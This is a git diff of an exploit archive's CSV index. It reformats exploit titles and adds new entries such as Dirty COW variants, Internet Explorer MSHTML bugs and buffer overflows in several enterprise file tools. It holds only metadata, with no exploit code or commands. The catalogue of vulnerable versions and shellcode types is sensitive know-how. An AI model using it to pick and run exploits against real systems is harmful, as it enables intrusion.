diff --git a/files.csv b/files.csv index a14c17815..a8eebacf6 100644 --- a/files.csv +++ b/files.csv @@ -729,8 +729,8 @@ id,file,description,date,author,platform,type,port 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0 5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0 -5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0 -5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0 +5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0 +5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 @@ -5281,6 +5281,11 @@ id,file,description,date,author,platform,type,port 40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040 40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0 40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0 +40840,platforms/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",linux,dos,0 +40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 MSHTML - 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0 +40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 MSHTML - 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0 +40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 MSHTML - 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0 +40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5437,7 +5442,7 @@ id,file,description,date,author,platform,type,port 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 -718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0 +718,platforms/linux/local/718.c,"Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0 739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 @@ -5787,7 +5792,7 @@ id,file,description,date,author,platform,type,port 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0 -4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0 +4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0 4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0 4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 @@ -6514,8 +6519,8 @@ id,file,description,date,author,platform,type,port 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 -15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 -15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0 +15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 +15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0 @@ -7832,7 +7837,7 @@ id,file,description,date,author,platform,type,port 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0 -24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0 +24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0 24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0 24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0 @@ -7904,7 +7909,7 @@ id,file,description,date,author,platform,type,port 25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0 -26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0 +26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0 26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0 @@ -8636,8 +8641,8 @@ id,file,description,date,author,platform,type,port 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 -40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0 -40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0 +40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0 +40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation",2016-10-21,"Robin Verton",linux,local,0 40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 @@ -8651,6 +8656,7 @@ id,file,description,date,author,platform,type,port 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 +40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)",2016-10-26,"Phil Oester",linux,local,0 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 @@ -8660,6 +8666,7 @@ id,file,description,date,author,platform,type,port 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0 40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0 +40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation",2016-11-28,FireFart,linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -10073,7 +10080,7 @@ id,file,description,date,author,platform,type,port 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80 10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 -10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 +10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 @@ -11167,7 +11174,7 @@ id,file,description,date,author,platform,type,port 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote,0 18735,platforms/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote,0 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0 -18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0 +18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0 @@ -15023,6 +15030,7 @@ id,file,description,date,author,platform,type,port 40113,platforms/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (1)",2016-07-18,"Eddie Harari",linux,remote,22 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 +40846,platforms/android/remote/40846.html,"Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration (2)",2016-07-20,0_o,linux,remote,22 @@ -15098,6 +15106,12 @@ id,file,description,date,author,platform,type,port 40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80 40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0 40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80 +40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 +40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 +40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 +40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 +40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 +40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15553,7 +15567,7 @@ id,file,description,date,author,platform,type,port 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 -40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (25 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0 +40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0 @@ -15934,7 +15948,7 @@ id,file,description,date,author,platform,type,port 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0 -1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0 +1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 @@ -16201,7 +16215,7 @@ id,file,description,date,author,platform,type,port 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 -1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 +1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0 @@ -16736,7 +16750,7 @@ id,file,description,date,author,platform,type,port 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Inclusion",2006-10-24,Kacper,php,webapps,0 -2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 +2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0 @@ -16796,13 +16810,13 @@ id,file,description,date,author,platform,type,port 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0 2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0 -2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 +2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0 2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Inclusion",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0 -2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - (av) Remote File Inclusion",2006-11-06,the_day,php,webapps,0 +2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0 @@ -16873,7 +16887,7 @@ id,file,description,date,author,platform,type,port 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0 2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0 -2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - (index.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 +2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 @@ -17236,7 +17250,7 @@ id,file,description,date,author,platform,type,port 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0 -3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0 +3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection",2007-03-04,ajann,php,webapps,0 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 